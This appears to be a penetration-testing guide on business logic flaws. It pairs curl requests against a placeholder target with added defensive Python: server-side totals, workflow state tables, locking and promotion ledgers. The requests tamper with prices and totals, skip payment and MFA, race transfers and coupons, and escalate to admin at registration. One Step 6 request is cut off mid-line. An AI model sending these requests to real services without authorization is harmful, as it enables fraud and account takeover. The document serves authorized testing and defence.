testing-for-business-logic-vulnerabilities
Identifying flaws in application business logic that allow price manipulation, workflow bypass, and privilege escalation beyond what technical vulnerability scanners can detect.
# Testing for Business Logic Vulnerabilities
## When to Use
- During authorized penetration tests when automated scanners have found few technical vulnerabilities
- When assessing e-commerce platforms for pricing, cart, and payment flow manipulations
- For testing multi-step workflows (registration, checkout, approval processes) for bypass opportunities
- When evaluating rate-limited features like vouchers, coupons, referrals, and rewards systems
- During security assessments of financial applications, voting systems, or any application with critical business rules
## Prerequisites
- **Authorization**: Written penetration testing agreement covering business logic testing
- **Burp Suite Professional**: For intercepting and modifying multi-step request flows
- **Application understanding**: Thorough knowledge of the application's intended business workflows
- **Multiple test accounts**: Accounts at different privilege levels and states
- **Browser DevTools**: For examining client-side validation logic
- **Documentation**: Business requirements or user stories describing expected behavior
## Workflow
### Step 1: Map Business Workflows and Rules
Document all critical business processes and their expected constraints.
```
# Critical business flows to map:
# 1. Registration/Onboarding flow
# - Email verification requirements
# - Account approval process
# - Role assignment logic
# 2. E-commerce/Purchase flow
# - Product selection → Cart → Checkout → Payment → Confirmation
# - Price calculation logic
# - Discount/coupon application
# - Quantity limits
# - Shipping cost calculation
# 3. Authentication/Authorization flow
# - Login → MFA → Dashboard
# - Password reset → Token → New password
# - Role escalation/approval
# 4. Financial transactions
# - Balance check → Transfer → Confirmation
# - Withdrawal limits
# - Currency conversion
# Document expected constraints:
# - Minimum order amounts
# - Maximum quantity per item
# - Coupon usage limits (one per user)
# - Referral reward caps
# - Withdrawal daily limits
# - Account verification requirements before certain actions
```
### Step 2: Test Price and Quantity Manipulation
Intercept and modify price, quantity, and total values in requests.
```bash
# Test negative quantity
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": -1, "price": 99.99}' \
"https://target.example.com/api/cart/add"
# Test zero price
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 1, "price": 0}' \
"https://target.example.com/api/cart/add"
# Test extremely large quantity
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 999999999}' \
"https://target.example.com/api/cart/add"
# Test decimal/float manipulation
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 0.001, "price": 0.01}' \
"https://target.example.com/api/cart/add"
# Test integer overflow
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 2147483647}' \
"https://target.example.com/api/cart/add"
# Modify total amount directly in checkout request
# Intercept in Burp and change total from 299.99 to 0.01
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id": "abc123", "total": 0.01, "payment_method": "card"}' \
"https://target.example.com/api/checkout"
```
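The checks these requests probe all come down to one server-side rule: prices and totals are recomputed from the catalog, never read from the client, and quantities are validated as bounded positive integers. The following Python is an added illustration of that rule, not code from this skill or from any target application; the catalog, limits and the `handle` wrapper are constructed for the example.

```python
from decimal import Decimal, ROUND_HALF_UP

# Constructed catalog standing in for the database: the only source of prices the server trusts.
CATALOG = {
    1: {"name": "Widget", "price": Decimal("99.99"), "max_qty": 10},
    2: {"name": "Gadget", "price": Decimal("250.00"), "max_qty": 2},
}

class ValidationError(ValueError):
    pass

def validate_quantity(qty, max_qty: int) -> int:
    # bool is a subclass of int in Python, so reject it explicitly; floats and strings fail the isinstance check
    if isinstance(qty, bool) or not isinstance(qty, int):
        raise ValidationError("quantity must be an integer")
    if qty < 1:
        raise ValidationError("quantity must be at least 1")
    if qty > max_qty:
        raise ValidationError(f"quantity exceeds limit of {max_qty}")
    return qty

def add_to_cart(cart: dict, body: dict) -> dict:
    """Apply a POST /api/cart/add body. A client-supplied 'price' field is simply never read."""
    product = CATALOG.get(body.get("product_id"))
    if product is None:
        raise ValidationError("unknown product")
    qty = validate_quantity(body.get("quantity"), product["max_qty"])
    line = cart.setdefault(body["product_id"], {"quantity": 0})
    if line["quantity"] + qty > product["max_qty"]:
        raise ValidationError("quantity limit exceeded across cart")
    line["quantity"] += qty
    return cart

def cart_total(cart: dict) -> Decimal:
    """Total is derived from catalog prices and stored quantities, using Decimal to avoid float drift."""
    total = sum((CATALOG[pid]["price"] * line["quantity"] for pid, line in cart.items()), Decimal("0"))
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)

def checkout(cart: dict, body: dict) -> Decimal:
    """The amount charged is recomputed here; the client's 'total' is only compared for agreement."""
    expected = cart_total(cart)
    if expected <= 0:
        raise ValidationError("empty cart")
    if "total" in body and Decimal(str(body["total"])) != expected:
        raise ValidationError(f"total mismatch: client sent {body['total']}, server computed {expected}")
    return expected

def handle(fn, *args) -> tuple:
    """Minimal API-layer wrapper: (200, result) on success, (400, error message) on a rejected request."""
    try:
        return 200, fn(*args)
    except ValidationError as exc:
        return 400, str(exc)

if __name__ == "__main__":
    cart = {}
    for body in ({"product_id": 1, "quantity": -1, "price": 99.99},
                 {"product_id": 1, "quantity": 1, "price": 0},
                 {"product_id": 1, "quantity": 999999999},
                 {"product_id": 1, "quantity": 0.001, "price": 0.01}):
        print(body, "->", handle(add_to_cart, cart, body))
    print("tampered total ->", handle(checkout, cart, {"cart_id": "abc123", "total": 0.01}))
    print("honest total   ->", handle(checkout, cart, {"cart_id": "abc123", "total": 99.99}))
```

A total mismatch is logged as well as rejected: a client that sends `0.01` for a `99.99` cart is not a rounding problem, and that event is a useful detection signal for the defenders reviewing the findings from this step.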
### Step 3: Test Workflow Step Bypass
Attempt to skip required steps in multi-step processes.
```bash
# Skip email verification
# Instead of: Register → Verify email → Access dashboard
# Try: Register → Access dashboard directly
curl -s -H "Authorization: Bearer $UNVERIFIED_TOKEN" \
"https://target.example.com/api/dashboard"
# Skip payment step
# Instead of: Cart → Shipping → Payment → Confirmation
# Try: Cart → Confirmation (skip payment)
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id": "abc123", "shipping_address": "123 Main St"}' \
"https://target.example.com/api/orders/confirm"
# Skip MFA step
# Instead of: Login → MFA → Dashboard
# Try: Login → Dashboard (skip MFA)
# After successful password auth, directly access protected resources
# Skip approval process
# Instead of: Submit request → Manager approval → Access granted
# Try: Submit request → Access granted (skip approval)
# Repeat a step that should be one-time
# Apply same coupon code multiple times
for i in $(seq 1 5); do
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_code": "DISCOUNT50"}' \
"https://target.example.com/api/cart/apply-coupon"
echo "Attempt $i"
done
```
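Every bypass in this step succeeds only when the server infers "which step are we on" from the request instead of from its own record. The fix is a server-side state table in which each action is valid from exactly one predecessor state. The Python below is an added example of that pattern, not code from this skill; the `checkout` and `login` state names, the `confirm_order` and `dashboard` handlers and the `try_call` wrapper are constructed for illustration.

```python
class WorkflowError(Exception):
    pass

class Workflow:
    """A table of (current_state, action) -> next_state. Any pair not in the table is rejected."""
    def __init__(self, name: str, transitions: dict, start: str):
        self.name, self.transitions, self.start = name, transitions, start

    def advance(self, record: dict, action: str) -> str:
        # The current state is read from the server-side record, never from the request body.
        current = record.get("state", self.start)
        nxt = self.transitions.get((current, action))
        if nxt is None:
            raise WorkflowError(f"{self.name}: {action!r} is not allowed from state {current!r}")
        record["state"] = nxt
        return nxt

    def require(self, record: dict, wanted: str) -> bool:
        current = record.get("state", self.start)
        if current != wanted:
            raise WorkflowError(f"{self.name}: must be in {wanted!r}, not {current!r}")
        return True

# Checkout: there is no path to "confirmed" that does not pass through "paid".
CHECKOUT = Workflow("checkout", {
    ("cart", "set_shipping"): "shipping",
    ("shipping", "pay"): "paid",
    ("paid", "confirm"): "confirmed",
}, start="cart")

# Login: a password alone leaves the session in "password_verified"; MFA is required to authenticate.
LOGIN = Workflow("login", {
    ("anonymous", "password_ok"): "password_verified",
    ("password_verified", "mfa_ok"): "authenticated",
}, start="anonymous")

def confirm_order(order: dict) -> str:
    """POST /api/orders/confirm: reachable only once a payment has been recorded on the order."""
    return CHECKOUT.advance(order, "confirm")

def dashboard(session: dict) -> str:
    """GET /api/dashboard: the session must have completed every login step."""
    LOGIN.require(session, "authenticated")
    return "dashboard for " + session["user"]

def try_call(fn, *args) -> tuple:
    """(200, result) on success, (403, reason) when the workflow rejects the action."""
    try:
        return 200, fn(*args)
    except WorkflowError as exc:
        return 403, str(exc)

if __name__ == "__main__":
    order = {"cart_id": "abc123"}
    print("confirm from cart ->", try_call(confirm_order, order))
    CHECKOUT.advance(order, "set_shipping"); CHECKOUT.advance(order, "pay")
    print("confirm after payment ->", try_call(confirm_order, order))
    session = {"user": "alice"}
    LOGIN.advance(session, "password_ok")
    print("dashboard after password only ->", try_call(dashboard, session))
```

The `pay` transition should itself be driven by a server-verified event (a processor callback or a settled-payment lookup), not by the client posting `"pay"`; otherwise the table only moves the bypass one step earlier. The same table is what makes the one-time coupon case testable: an action that has no entry from the state it leaves the record in cannot be repeated.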
### Step 4: Test Race Conditions in Business Logic
Exploit timing windows in concurrent request processing.
```bash
# Race condition on coupon application
# Send multiple identical requests simultaneously
for i in $(seq 1 10); do
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_code": "ONETIME50"}' \
"https://target.example.com/api/cart/apply-coupon" &
done
wait
# Race condition on balance transfer
# If user has $100, try to transfer $100 to two accounts simultaneously
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"to": "user_b", "amount": 100}' \
"https://target.example.com/api/transfer" &
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"to": "user_c", "amount": 100}' \
"https://target.example.com/api/transfer" &
wait
# Race condition on reward claiming
# Using Burp Turbo Intruder for precise timing:
# 1. Send request to Turbo Intruder
# 2. Use race condition script template
# 3. Send 20+ requests simultaneously
# 4. Check if reward was claimed multiple times
```
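What the parallel `curl` requests above are probing is a check-then-act sequence (read balance, compare, write) that is not atomic. The Python below is an added demonstration, not code from this skill, of why that fails and what the fix looks like: the unsafe version uses a `threading.Barrier` to force every request to read the balance before any of them writes (a deterministic stand-in for the timing window), and the safe version performs the check and the debit under a single lock. `Account`, `demo` and the amounts are constructed for the example.

```python
import threading

class Account:
    def __init__(self, balance: int):
        self.balance = balance
        self.lock = threading.Lock()

def unsafe_transfer(src: Account, amount: int, barrier: threading.Barrier) -> bool:
    """Check-then-act with no synchronisation: every concurrent request decides on the same stale read."""
    seen = src.balance                 # 1. read
    barrier.wait()                     # all threads have read before anyone writes (forces the race)
    if seen >= amount:                 # 2. check against the stale value
        src.balance = seen - amount    # 3. write, clobbering whatever other threads did
        return True
    return False

def safe_transfer(src: Account, amount: int) -> bool:
    """Check and debit under one lock: the second request observes the already-debited balance."""
    with src.lock:
        if src.balance >= amount:
            src.balance -= amount
            return True
        return False

def run_concurrent(n: int, fn) -> int:
    """Run fn() on n threads at once and return how many of them reported success."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(fn())) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)

def demo(n: int = 10, amount: int = 100) -> dict:
    # Constructed scenario: a $100 balance and n simultaneous $100 transfers.
    racy = Account(100)
    barrier = threading.Barrier(n)
    unsafe_ok = run_concurrent(n, lambda: unsafe_transfer(racy, amount, barrier))
    locked = Account(100)
    safe_ok = run_concurrent(n, lambda: safe_transfer(locked, amount))
    return {
        "unsafe_successes": unsafe_ok, "unsafe_balance": racy.balance,
        "safe_successes": safe_ok, "safe_balance": locked.balance,
    }

if __name__ == "__main__":
    print(demo())
```

Run stand-alone, the unsafe account reports ten successful $100 transfers from a $100 balance while ending at zero, which is exactly the double-spend the test above looks for; the locked account allows one. In a database-backed service the lock is a transaction that holds a row lock (`SELECT ... FOR UPDATE`) or a conditional write such as `UPDATE accounts SET balance = balance - 100 WHERE id = ? AND balance >= 100`, succeeding only when a row was affected; a unique constraint on `(user_id, coupon_code)` serves the same purpose for one-time rewards.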
### Step 5: Test Referral and Reward System Abuse
Find ways to exploit promotional features and reward mechanisms.
```bash
# Self-referral: refer your own email
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"referral_email": "[email protected]"}' \
"https://target.example.com/api/referrals/invite"
# Referral code reuse across multiple accounts
# Create multiple accounts and use same referral code
# Coupon stacking: apply multiple discount codes
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_codes": ["SAVE10", "WELCOME20", "VIP50"]}' \
"https://target.example.com/api/cart/apply-coupons"
# Abuse free trial: re-register with same details
# Test if [email protected] or [email protected] bypass duplicate detection
# Gift card / credit manipulation
# Buy gift card with gift card balance (circular)
# Apply gift card with value > purchase price (get change as credit)
# Test reward point manipulation
# Earn points on order → Cancel order → Keep points
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/orders/12345/cancel"
# Check if reward points from order 12345 were revoked
```
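Each abuse in this step corresponds to a rule the promotion ledger has to enforce on the server: one coupon per cart, one redemption per account, no self-referral under an alias, and rewards that are reversed together with the order they came from. The Python below is an added example of such a ledger, not code from this skill; the `normalize_email` policy (lower-case, `+tag` stripped) and the status codes are assumptions for the example.

```python
class PromotionError(Exception):
    pass

def normalize_email(address: str) -> str:
    """Canonical form for duplicate detection (assumed policy: case-insensitive, '+tag' in the local part dropped)."""
    local, _, domain = address.strip().lower().rpartition("@")
    local = local.split("+", 1)[0]
    return f"{local}@{domain}"

class PromotionLedger:
    def __init__(self):
        self.coupon_uses = set()   # (user_id, code): a code is redeemable once per account
        self.cart_coupon = {}      # cart_id -> code: a single code per cart, so no stacking
        self.points = {}           # user_id -> reward point balance
        self.order_points = {}     # order_id -> (user_id, points awarded) for later reversal

    def apply_coupon(self, user_id: str, cart_id: str, code: str) -> str:
        if cart_id in self.cart_coupon:
            raise PromotionError("a coupon is already applied to this cart")
        if (user_id, code) in self.coupon_uses:
            raise PromotionError("coupon already redeemed by this account")
        # Reserved at apply time; a real service releases the reservation if the cart is abandoned (not shown).
        self.coupon_uses.add((user_id, code))
        self.cart_coupon[cart_id] = code
        return code

    def invite(self, referrer_email: str, invitee_email: str) -> bool:
        if normalize_email(referrer_email) == normalize_email(invitee_email):
            raise PromotionError("self-referral")
        return True

    def award_points(self, user_id: str, order_id: str, points: int) -> int:
        self.points[user_id] = self.points.get(user_id, 0) + points
        self.order_points[order_id] = (user_id, points)
        return self.points[user_id]

    def cancel_order(self, order_id: str) -> int:
        """Cancelling an order posts a compensating entry so the reward does not outlive the purchase."""
        user_id, pts = self.order_points.pop(order_id)
        self.points[user_id] -= pts
        return self.points[user_id]

def api(fn, *args) -> tuple:
    """(200, result) on success, (409, reason) when a promotion rule rejects the request."""
    try:
        return 200, fn(*args)
    except PromotionError as exc:
        return 409, str(exc)

if __name__ == "__main__":
    ledger = PromotionLedger()
    print(api(ledger.apply_coupon, "u1", "cart1", "SAVE10"))
    print("stack ->", api(ledger.apply_coupon, "u1", "cart1", "WELCOME20"))
    print("self-refer ->", api(ledger.invite, "user@example.com", "User+promo@example.com"))
    ledger.award_points("u1", "12345", 150)
    print("points after cancel ->", ledger.cancel_order("12345"))
```

The gift-card cases in this step follow the same shape: a purchase of stored value must not be payable with the same stored value, and a balance applied above the order amount is capped at the order amount rather than converted to credit; both are single comparisons in the order handler once the totals are computed server-side.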
### Step 6: Test Role and Permission Logic
Assess authorization logic for privilege escalation through business processes.
```bash
# Role escalation via registration parameter
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"email":"[email protected]","password":"Test1234!","role":"admin"}' \
"https://target.example.com/api/auth/register"
# Organization tenant boundary testing
# User in Org A tries to access Org B resources via business workflows
curl -s -X POST \
-H "Authorization: Bearer $TOKEN_ORG_A" \
-H "Conten
```
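Both findings in this step are about which request fields the server is willing to act on: a registration handler that copies the whole body into the user record will accept `"role": "admin"`, and a resource lookup that takes the tenant from the request instead of the session will serve another organization's data. The Python below is an added example of the hardened form, not code from this skill; the field allowlist, the `RESOURCES` table, the session shape and the status codes are constructed for the illustration (password hashing is omitted as out of scope).

```python
# Allowlist of fields the registration endpoint will read; everything else in the body is dropped.
REGISTRATION_FIELDS = {"email", "password"}

def register(body: dict, users: dict) -> dict:
    """POST /api/auth/register: role and tenant are set by server policy, never taken from the request."""
    data = {k: body[k] for k in REGISTRATION_FIELDS if k in body}
    if data.keys() != REGISTRATION_FIELDS:
        raise ValueError("email and password are required")
    ignored = sorted(set(body) - REGISTRATION_FIELDS)   # worth logging: "role" here is a probe
    user = {"email": data["email"], "role": "user", "org_id": None}
    users[data["email"]] = user
    return {"user": user, "ignored_fields": ignored}

# Constructed resources, each owned by exactly one tenant.
RESOURCES = {
    "inv-1": {"org_id": "org_a", "amount": 10},
    "inv-2": {"org_id": "org_b", "amount": 20},
}

def get_resource(session: dict, resource_id: str) -> tuple:
    """The tenant comes from the authenticated session, and the lookup is scoped by it."""
    row = RESOURCES.get(resource_id)
    if row is None or row["org_id"] != session["org_id"]:
        # One response for "does not exist" and "belongs to another tenant", so the API is not an existence oracle.
        return 404, "not found"
    return 200, row

if __name__ == "__main__":
    users = {}
    print(register({"email": "test@example.com", "password": "Test1234!", "role": "admin"}, users))
    org_a_session = {"user": "alice", "org_id": "org_a"}
    print("own tenant  ->", get_resource(org_a_session, "inv-1"))
    print("other tenant ->", get_resource(org_a_session, "inv-2"))
```

The `ignored_fields` value is returned here only to make the behaviour visible; in production it belongs in a log line, where a client posting `role` at registration is a low-noise indicator of exactly the test this step describes.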